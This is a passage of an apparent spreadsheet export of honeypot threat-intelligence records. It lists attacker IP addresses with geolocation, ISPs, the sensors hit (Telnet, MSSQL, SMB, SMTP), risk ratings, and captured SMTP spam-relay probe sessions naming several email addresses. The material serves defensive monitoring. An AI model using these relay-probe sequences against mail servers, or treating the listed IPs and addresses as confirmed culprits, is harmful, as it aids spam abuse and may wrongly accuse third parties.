    <s v="NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 24 Mar 2025 13:46:38 +0100_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 24 Mar 2025 14:02:40 +0100_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 25 Mar 2025 17:05:20 +0100_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 28 Mar 2025 16:34:34 +0100_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 30 Mar 2025 21:41:43 +0200_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 7 Apr 2025 14:14:29 +0200_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '94.131.97.67_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 7 Apr 2025 16:14:07 +0200_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '94.131.118.77_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 7 Apr 2025 16:23:17 +0200_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 8 Apr 2025 15:36:25 +0200_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 15 Apr 2025 18:45:37 +0200_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8d62:ac1"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium&amp;&amp;High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1247"/>
    <x v="1247"/>
    <s v="NA&amp;&amp;211-23-69-9.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-18T14:10:49"/>
    <d v="2025-04-17T06:42:35"/>
    <d v="2025-04-18T14:10:49"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0501"/>
    <s v="121.565"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d317:4509"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1248"/>
    <x v="1248"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T13:15:04"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-18T13:15:04"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Trivandrum"/>
    <s v="Thiruvananthapuram (Technopark Campus)"/>
    <s v="1254163"/>
    <s v="695034"/>
    <s v="8.5581"/>
    <s v="76.8816"/>
    <s v="17465"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2006-03-08"/>
    <s v="ASIANET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.164.150.6,64727)}&amp;&amp;{Data_SMB:Incoming connection (202.164.150.6,56002)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:caa4:9606"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1249"/>
    <x v="1249"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T13:11:03"/>
    <d v="2025-04-14T20:33:45"/>
    <d v="2025-04-18T13:11:03"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="ES"/>
    <s v="Espírito Santo"/>
    <s v="Marataízes"/>
    <s v="Marataizes"/>
    <s v="3457819"/>
    <s v="NA"/>
    <s v="-21.0433"/>
    <s v="-40.8244"/>
    <s v="262296"/>
    <s v="Windx Telecomunicações"/>
    <s v="Windx Telecomunicações"/>
    <s v="business"/>
    <s v="Windx Telecomunicações"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b10b:7903"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1250"/>
    <x v="1250"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T12:25:47"/>
    <d v="2025-04-14T15:38:11"/>
    <d v="2025-04-18T12:25:47"/>
    <n v="53"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1047"/>
    <s v="120.681"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:e391"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1251"/>
    <x v="1251"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T12:00:52"/>
    <d v="2025-04-18T12:00:52"/>
    <d v="2025-04-18T12:00:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT-AS-VN"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="corporate"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a6:994c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Based on the provided data, it appears that an attacker is scanning and probing various services on a network, attempting to identify potential vulnerabilities and gain unauthorized access. The activities observed include: &amp;&amp; It appears that the attacker is attempting to scan and probe various services on a network, likely as part of a reconnaissance phase or to identify vulnerable systems. The data suggests that the attacker is trying to gather information about the target system's configuration, software versions, and potential vulnerabilities."/>
    <s v="The attacker is trying to fingerprint different services and protocols on the network, sending probes and requests to gather information about the available services and their configurations. &amp;&amp; The attacker may also be attempting to exploit certain services, such as FTP, HTTP, HTTPS, and SMB, by sending malicious requests or credentials."/>
  </r>
  <r>
    <x v="1252"/>
    <x v="1252"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T11:38:11"/>
    <d v="2024-12-03T14:26:43"/>
    <d v="2025-04-18T11:38:11"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="S.A.S Nagar"/>
    <s v="Mohali"/>
    <s v="6992326"/>
    <s v="NA"/>
    <s v="30.68"/>
    <s v="76.7221"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Hfcl Infotel LTD"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2009-02-11"/>
    <s v="DSL-BROADBAND"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70c4:73bb"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1253"/>
    <x v="1253"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T11:11:22"/>
    <d v="2025-04-16T02:11:04"/>
    <d v="2025-04-18T11:11:22"/>
    <n v="35"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IL"/>
    <s v="Israel"/>
    <s v="Z"/>
    <s v="Northern District"/>
    <s v="NA"/>
    <s v="Afula"/>
    <s v="295740"/>
    <s v="NA"/>
    <s v="32.6091"/>
    <s v="35.2892"/>
    <s v="6810"/>
    <s v="Bezeq- THE ISRAEL TELECOMMUNICATION CORP. LTD."/>
    <s v="Bezeq- THE ISRAEL TELECOMMUNICATION CORP. LTD."/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:956a:8aaa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1254"/>
    <x v="1254"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T11:11:04"/>
    <d v="2024-12-01T11:56:24"/>
    <d v="2025-04-18T11:11:04"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H10"/>
    <s v="445&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BD"/>
    <s v="Bangladesh"/>
    <s v="F"/>
    <s v="Rangpur Division"/>
    <s v="Thakurgaon"/>
    <s v="Thakurgaon"/>
    <s v="1185092"/>
    <s v="NA"/>
    <s v="26.031"/>
    <s v="88.4699"/>
    <s v="134968"/>
    <s v="Maya Cyber World"/>
    <s v="Mizanur Rahman t/a Maya Cyber World"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.23.206.20,58428)}&amp;&amp;{Data_SMB:Incoming connection (103.23.206.20,58492)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6717:ce14"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1255"/>
    <x v="1255"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T11:10:05"/>
    <d v="2025-02-05T00:58:24"/>
    <d v="2025-04-18T11:10:05"/>
    <n v="21"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="São Paulo"/>
    <s v="São Paulo"/>
    <s v="3448439"/>
    <s v="01000-000"/>
    <s v="-23.5558"/>
    <s v="-46.6396"/>
    <s v="28573"/>
    <s v="Claro NXT Telecomunicacoes Ltda"/>
    <s v="Claro NXT Telecomunicacoes Ltda"/>
    <s v="business"/>
    <s v="NET Serviços de Comunicação S.A."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b3df:480c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1256"/>
    <x v="1256"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T10:12:39"/>
    <d v="2024-04-11T11:00:00"/>
    <d v="2025-04-18T10:12:39"/>
    <n v="521"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H9&amp;&amp;SMA-LAB_SMTP_H35&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_H27"/>
    <s v="57976&amp;&amp;25&amp;&amp;NA&amp;&amp;80&amp;&amp;3389"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="LT"/>
    <s v="Lithuania"/>
    <s v="KU"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="598316"/>
    <s v="44001"/>
    <s v="54.9072"/>
    <s v="24.0019"/>
    <s v="209605"/>
    <s v="UAB Host Baltic"/>
    <s v="UAB Host Baltic"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;GET&amp;&amp;POST"/>
    <s v="NA&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 3 Feb 2025 03:44:52 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 6 Feb 2025 03:33:48 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '193.57.138.110_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 6 Feb 2025 23:52:01 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;nelsonlonard@gmail.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;attorneyjosephbryant@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;legalcertifieddiplomaticagent@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;victorjunior_1@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;internalrevenueeservice@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;PenFedCreditUnionBank@protonmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;johnflin_sbc@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 8 Feb 2025 06:42:51 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 8 Feb 2025 11:45:55 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 9 Feb 2025 23:35:32 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 12 Feb 2025 04:41:25 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '144.126.148.5_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 12 Feb 2025 08:03:47 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 